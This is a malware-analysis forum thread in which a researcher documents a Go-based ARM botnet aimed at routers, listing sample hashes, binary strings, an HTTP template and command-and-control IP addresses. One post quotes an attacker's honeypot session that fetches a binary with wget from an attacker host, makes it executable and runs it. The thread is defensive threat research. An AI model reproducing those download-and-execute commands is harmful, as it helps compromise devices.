A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #23910  by unixfreaxjp
 Wed Sep 17, 2014 6:55 am
I was reported this GOARM Binary: https://www.virustotal.com/en/file/81c9 ... 410603481/ Many downloads:
Image
It's an ARM architecture bot, based on Go programming compiled for Armv6 with Cypto and Encoding libs. Go projects PoC:
Code: Select all
// go runtime..
0x29B39C   runtime.selectgo
0x2AB1EC   runtime.gogo
(etc)
// go project..
0x31A3D1   /Users/fc/GoProjects/armv6/src/server2/server.go
0x31A403   /Users/fc/GoProjects/armv6/src/server2/message.pb.go
0x31A439   /Users/fc/GoProjects/armv6/src/server2/client.go
0x31BDE1   /Users/fc/GoProjects/armv6/src/main.go
0x31A3D1   /Users/fc/GoProjects/armv6/src/server2/server.go
0x31A403   /Users/fc/GoProjects/armv6/src/server2/message.pb.go
0x31A439   /Users/fc/GoProjects/armv6/src/server2/client.go
0x31BDE1   /Users/fc/GoProjects/armv6/src/main.go
// Go source codes:
 %3d: t=%3d start
 %3d: t=%3d bytes [%d]
 %3d: t=%3d end err %v
 %3d: t=%3d fix32 %d
 %3d: t=%3d fix64 %d
 %3d: t=%3d varint %d
 %3d: fetching op err %v
 %3d: t=%3d fix32 err %v
 %3d: t=%3d fix64 err %v
 %3d: t=%3d start err %v
 %3d: t=%3d unknown wire=%d
 %3d: t=%3d varint err %v
 %3d: t=%3d end
 %3d: start-end not balanced %d 
HTTP send template:
Code: Select all
%s %s HTTP/1.1
User-Agent: %s
; Domain=%s
; Path=%s
; Expires=%s
; Max-Age=%d
Host: %s 
^^ Spotted together with the DDoS'er tools. Feel free to verdict this further :D
You do not have the required permissions to view the files attached to this post.
Last edited by unixfreaxjp on Wed Sep 17, 2014 8:45 am, edited 1 time in total.
 #23911  by unixfreaxjp
 Wed Sep 17, 2014 7:54 am
Another sample, different source: https://www.virustotal.com/en/file/27d4 ... 410939480/
So it is used by other infection too.. It is official then, new malware: Linux/GoARM.Bot.
Naming explanation:
GO = GO language
ARM = specifically compiled for ARM..
Bot.. I can verdict the bot (backdoor) function and http command, so does the low level functions (connections, calls) but still working on its DDoS function, so = "Linux / GoARM.Bot" it is.
You do not have the required permissions to view the files attached to this post.
Last edited by unixfreaxjp on Wed Sep 17, 2014 12:20 pm, edited 1 time in total.
 #24176  by unixfreaxjp
 Mon Oct 20, 2014 4:24 pm
New sample, quite big infection hits, this malware is specifically designed aim for ARM devices.
Image
VT: https://www.virustotal.com/en/file/5883 ... 413822096/ < thx to benkow
CNC:
Code: Select all
222.186.56.102||23650 | 222.186.56.0/21 | CHINANET-JS-AS | CN | CHINATELECOM.COM.CN | CHINANET JIANGSU PROVINCE NETWORK
You do not have the required permissions to view the files attached to this post.
 #26759  by unixfreaxjp
 Sat Sep 19, 2015 7:59 am
New fresh one, attacking routers together with MrBLack & AESddos("hacker").
Image
Sample: https://www.virustotal.com/en/file/3b6d ... /analysis/
cnc: 222.186.34.220, panel: 183.60.216.182, bruter(ssh): 60.166.61.110
Code: Select all
2015-09-18 10:35:39 [session=78,ip=60.166.61.110] wget http://183.60.216.182:88/scan.exe
2015-09-18 10:35:44 [session=78,ip=60.166.61.110] chmod 777 scan.txt
2015-09-18 10:35:49 [session=78,ip=60.166.61.110] ./scan.exe &
You do not have the required permissions to view the files attached to this post.
 #26802  by unixfreaxjp
 Fri Sep 25, 2015 4:35 pm
8-) Now I am sure ChinaZ is behind these latest GoARM campaigns,
today's attack with ARM(el) v7 stripped & static ELF as target looks aiming Ubuntu basis routers default pwd..
Image

And here it is:
Image

Summarized:
Code: Select all
#CHINAZ + #GoARMBot + static strip ARMel #ELF =aim #ROUTER
Atk(ssh): 14.29.32.162
Pnl: 111.206.76.35 (appdown.keyipin.com)
Cnc: 222.186.31.182:6004
Report: http://imgur.com/a/CKBPx <== BIG PICS IS HERE
Routers are not save anymore.. yet let them come, I'm ready. :lol:

Just for convincing the CNC data for evidence, took this pcap but they're closing the port after several "greetings" beforehand:
Image

Sample: https://www.virustotal.com/en/file/284a ... 443197004/
You do not have the required permissions to view the files attached to this post.